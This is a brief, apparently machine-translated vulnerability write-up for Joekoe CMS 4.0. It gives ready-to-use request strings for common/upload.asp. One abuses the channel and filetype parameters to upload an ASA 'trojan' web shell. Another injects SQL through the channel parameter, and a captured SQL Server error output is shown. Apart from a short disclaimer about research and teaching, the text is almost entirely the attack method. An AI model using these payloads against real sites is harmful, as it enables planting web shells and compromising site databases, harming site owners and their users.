Test method: [Warning] The following procedures (methods) may be offensive and are only for security research and teaching. You are at your own risk! 1. upload Vulnerability: this vulnerability can be exploited to change the channel variable as long as it is not equal to forum or user. face, blog. you just need the logo, and then change filetype to Asa to upload the trojan. The specific URL can be the common/upload. asp? Channel = use & filetype = ASA & filename = & fileinput = u_face & formname = & thumbname = & thumbinput =, and then upload 2. SQL injection vulnerability: Add statements such as common/upload. asp to channel variables? Channel = use '& filetype = GIF & filename = & fileinput = u_face & formname = & thumbname = & thumbinput = Joekoe CMS 4.0. Error message: Select top 1 u_id from db_sys_upload where U_url = 'user'/20070722031234c.gif' Original error: Error #-2147217900, row 1st: There is a syntax error near 'C. Microsoft OLE DB Provider for SQL Server Back to homepage Processed in 0.188 s, 1 queries, 54 cache. |